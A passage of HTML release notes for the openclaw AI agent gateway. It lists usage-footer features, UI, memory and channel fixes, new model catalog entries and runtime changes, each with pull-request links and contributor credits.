<li><code>/usage</code> and reply payload hooks now have a native full footer renderer, default template, fixed-decimal formatting, credential-aware limits, better partial-count handling, and warnings for broken templates instead of silent bad output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4655331882" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92657" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92657/hovercard" href="https://github.com/openclaw/openclaw/pull/92657">#92657</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4580034506" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/89835" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/89835/hovercard" href="https://github.com/openclaw/openclaw/pull/89835">#89835</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4575615670" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/89629" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/89629/hovercard" href="https://github.com/openclaw/openclaw/pull/89629">#89629</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvinthebored/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvinthebored">@Marvinthebored</a>.</li>
<li>UI and mobile flows are steadier: workspace files can collapse and start collapsed, WebChat backscroll survives streaming, the sidebar session picker remains interactive above the desktop workbench, reset soft args survive UI dispatch, stale dashboard session parent lineage is preserved, and iOS reconnects stale foreground gateways. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4656658624" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92779" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92779/hovercard" href="https://github.com/openclaw/openclaw/pull/92779">#92779</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4654733246" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92622" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92622/hovercard" href="https://github.com/openclaw/openclaw/pull/92622">#92622</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4655805295" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92705" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92705/hovercard" href="https://github.com/openclaw/openclaw/pull/92705">#92705</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4610838716" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91353" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91353/hovercard" href="https://github.com/openclaw/openclaw/pull/91353">#91353</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4596719543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/90658" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/90658/hovercard" href="https://github.com/openclaw/openclaw/pull/90658">#90658</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4653327563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92552" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92552/hovercard" href="https://github.com/openclaw/openclaw/pull/92552">#92552</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TurboTheTurtle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TurboTheTurtle">@TurboTheTurtle</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NianJiuZst/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NianJiuZst">@NianJiuZst</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhouhe-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhouhe-xydt">@zhouhe-xydt</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luoyanglang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luoyanglang">@luoyanglang</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>.</li>
<li>Memory, state, and diagnostics recover cleaner: oversized OpenAI embedding batches split before 431s, QMD memory search stays available in transient mode, SQLite avoids WAL on NFS state volumes, stuck-session recovery scheduling no longer resets warning backoff, and Infinity chunk limits stay genuinely unbounded. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4655085802" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92650" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92650/hovercard" href="https://github.com/openclaw/openclaw/pull/92650">#92650</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4654672627" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92618" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92618/hovercard" href="https://github.com/openclaw/openclaw/pull/92618">#92618</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4654886091" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92639" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92639/hovercard" href="https://github.com/openclaw/openclaw/pull/92639">#92639</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4608684001" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91247" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91247/hovercard" href="https://github.com/openclaw/openclaw/pull/91247">#91247</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4656365455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92752" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92752/hovercard" href="https://github.com/openclaw/openclaw/pull/92752">#92752</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4656087635" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92735" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92735/hovercard" href="https://github.com/openclaw/openclaw/pull/92735">#92735</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mushuiyu886/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mushuiyu886">@mushuiyu886</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TurboTheTurtle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TurboTheTurtle">@TurboTheTurtle</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/849261680/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/849261680">@849261680</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gnanam1990/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gnanam1990">@gnanam1990</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yhterrance/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yhterrance">@yhterrance</a>.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Providers/models: add GLM-5.2 support and Claude Haiku 4.5 catalog entries while keeping provider-qualified model IDs normalized across OpenRouter and Google Vertex paths. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4656989414" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92796" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92796/hovercard" href="https://github.com/openclaw/openclaw/pull/92796">#92796</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4585186905" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/90116" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/90116/hovercard" href="https://github.com/openclaw/openclaw/pull/90116">#90116</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4654773993" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92627" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92627/hovercard" href="https://github.com/openclaw/openclaw/pull/92627">#92627</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4608164776" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91218" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91218/hovercard" href="https://github.com/openclaw/openclaw/pull/91218">#91218</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arkyu2077/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arkyu2077">@arkyu2077</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liuhao1024/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liuhao1024">@liuhao1024</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bymle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bymle">@bymle</a>.</li>
<li>Channel plugins: ship Telegram rich-message delivery and WhatsApp ACP binding support, including rich prompt handoff to CLI backends and transport fixtures for richer drafts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4655597962" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92679" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92679/hovercard" href="https://github.com/openclaw/openclaw/pull/92679">#92679</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4651736205" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92513" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92513/hovercard" href="https://github.com/openclaw/openclaw/pull/92513">#92513</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TurboTheTurtle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TurboTheTurtle">@TurboTheTurtle</a>.</li>
<li>Agent commands: support <code>/btw</code> in CLI-backed sessions and keep CLI usage-error exits classified as usage failures instead of successful runs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4655549474" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92669" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92669/hovercard" href="https://github.com/openclaw/openclaw/pull/92669">#92669</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4640308781" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92162/hovercard" href="https://github.com/openclaw/openclaw/pull/92162">#92162</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Pandah97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Pandah97">@Pandah97</a>.</li>
<li>Usage hooks: add built-in full footer rendering, default footer templates, per-turn usage state, credential-aware limits, and fixed-decimal formatting for usage-bar templates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4655331882" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92657" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92657/hovercard" href="https://github.com/openclaw/openclaw/pull/92657">#92657</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4580034506" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/89835" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/89835/hovercard" href="https://github.com/openclaw/openclaw/pull/89835">#89835</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4575615670" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/89629" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/89629/hovercard" href="https://github.com/openclaw/openclaw/pull/89629">#89629</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvinthebored/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvinthebored">@Marvinthebored</a>.</li>
<li>Docs and operator guidance: document node config examples, clarify before-install hook scope, correct agent default concurrency comments, refresh ZAI provider docs, and update channel/group docs for current Telegram and WhatsApp behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4655581970" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92677" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92677/hovercard" href="https://github.com/openclaw/openclaw/pull/92677">#92677</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4656444241" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92766" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92766/hovercard" href="https://github.com/openclaw/openclaw/pull/92766">#92766</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4655702604" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92695" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92695/hovercard" href="https://github.com/openclaw/openclaw/pull/92695">#92695</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liuhao1024/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liuhao1024">@liuhao1024</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ArielSmoliar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ArielSmoliar">@ArielSmoliar</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Channels and delivery: preserve account-scoped DM channel send policy, rich Telegram final replies, rich Telegram tables and lists, Telegram thread-create CLI remapping, Slack outbound <code>message_sent</code> hooks, contributed message-tool schema optionality, same-channel generated media completions, and channel chunking around surrogate pairs and Infinity limits. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4656886090" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92788" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92788/hovercard" href="https://github.com/openclaw/openclaw/pull/92788">#92788</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4655597962" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92679" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92679/hovercard" href="https://github.com/openclaw/openclaw/pull/92679">#92679</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4570992089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/89421" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/89421/hovercard" href="https://github.com/openclaw/openclaw/pull/89421">#89421</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4582050697" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/89943" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/89943/hovercard" href="https://github.com/openclaw/openclaw/pull/89943">#89943</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4606864509" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91137" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91137/hovercard" href="https://github.com/openclaw/openclaw/pull/91137">#91137</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4608679911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91246" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91246/hovercard" href="https://github.com/openclaw/openclaw/pull/91246">#91246</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4656087635" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92735" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92735/hovercard" href="https://github.com/openclaw/openclaw/pull/92735">#92735</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yetval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yetval">@yetval</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spacegeologist/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spacegeologist">@spacegeologist</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rishitamrakar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rishitamrakar">@rishitamrakar</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lundog/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lundog">@lundog</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TurboTheTurtle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TurboTheTurtle">@TurboTheTurtle</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yhterrance/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yhterrance">@yhterrance</a>.</li>
<li>Agent, cron, and Gateway runtime: mark active main sessions before restart shutdown aborts, pause yielded subagent runs whose terminal also signals abort, preserve yielded media completions, de-duplicate main-session heartbeat events, expose session identity in runtime prompts, reject unknown OpenAI agent selectors, keep generated media completions in WebChat, and require admin privileges for HTTP session/model override surfaces. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4610905781" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91357" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91357/hovercard" href="https://github.com/openclaw/openclaw/pull/91357">#91357</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4654845566" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92631" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92631/hovercard" href="https://github.com/openclaw/openclaw/pull/92631">#92631</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4639558879" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92146" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92146/hovercard" href="https://github.com/openclaw/openclaw/pull/92146">#92146</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4609318080" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91287" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91287/hovercard" href="https://github.com/openclaw/openclaw/pull/91287">#91287</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4649907551" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92468" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92468/hovercard" href="https://github.com/openclaw/openclaw/pull/92468">#92468</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4651687491" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92510" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92510/hovercard" href="https://github.com/openclaw/openclaw/pull/92510">#92510</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4608679911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91246" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91246/hovercard" href="https://github.com/openclaw/openclaw/pull/91246">#91246</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4655100264" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92651" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92651/hovercard" href="https://github.com/openclaw/openclaw/pull/92651">#92651</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4654986467" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92646" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92646/hovercard" href="https://github.com/openclaw/openclaw/pull/92646">#92646</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ooiuuii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ooiuuii">@ooiuuii</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IWhatsskill/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IWhatsskill">@IWhatsskill</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ZengWen-DT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ZengWen-DT">@ZengWen-DT</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TurboTheTurtle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TurboTheTurtle">@TurboTheTurtle</a>.</li>
<li>Providers and model replay: preserve storeless OpenAI Responses replay compatibility, avoid eager tool streaming for Claude 4.5 in Copilot, honor profile auth for SecretRef model entries, bound model browsing, strip provider prefixes where runtimes need bare IDs, and surface nested embedding fetch failures. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4598134273" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/90706" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/90706/hovercard" href="https://github.com/openclaw/openclaw/pull/90706">#90706</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362622690" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75393" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75393/hovercard" href="https://github.com/openclaw/openclaw/pull/75393">#75393</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4597491219" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/90686" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/90686/hovercard" href="https://github.com/openclaw/openclaw/pull/90686">#90686</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4643273391" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92247" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92247/hovercard" href="https://github.com/openclaw/openclaw/pull/92247">#92247</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4654773993" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92627" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92627/hovercard" href="https://github.com/openclaw/openclaw/pull/92627">#92627</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4608164776" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91218" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91218/hovercard" href="https://github.com/openclaw/openclaw/pull/91218">#91218</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4654779185" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92628" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92628/hovercard" href="https://github.com/openclaw/openclaw/pull/92628">#92628</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/snowzlm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/snowzlm">@snowzlm</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kailigithub/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kailigithub">@Kailigithub</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rohitjavvadi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rohitjavvadi">@rohitjavvadi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samson910022/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samson910022">@samson910022</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liuhao1024/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liuhao1024">@liuhao1024</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bymle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bymle">@bymle</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mushuiyu886/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mushuiyu886">@mushuiyu886</a>.</li>
<li>Memory, state, diagnostics, and config: split header-too-large embedding batches, keep QMD memory search enabled in transient mode, avoid SQLite WAL on NFS volumes, preserve recovery scheduling outside stuck-session warning backoff, and keep shell environment fallbacks contained in config write tests. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4655085802" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92650" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92650/hovercard" href="https://github.com/openclaw/openclaw/pull/92650">#92650</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4654672627" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92618" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92618/hovercard" href="https://github.com/openclaw/openclaw/pull/92618">#92618</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4654886091" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92639" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92639/hovercard" href="https://github.com/openclaw/openclaw/pull/92639">#92639</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4608684001" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91247" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91247/hovercard" href="https://github.com/openclaw/openclaw/pull/91247">#91247</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4656365455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92752" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92752/hovercard" href="https://github.com/openclaw/openclaw/pull/92752">#92752</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mushuiyu886/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mushuiyu886">@mushuiyu886</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TurboTheTurtle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TurboTheTurtle">@TurboTheTurtle</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/849261680/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/849261680">@849261680</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gnanam1990/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gnanam1990">@gnanam1990</a>.</li>
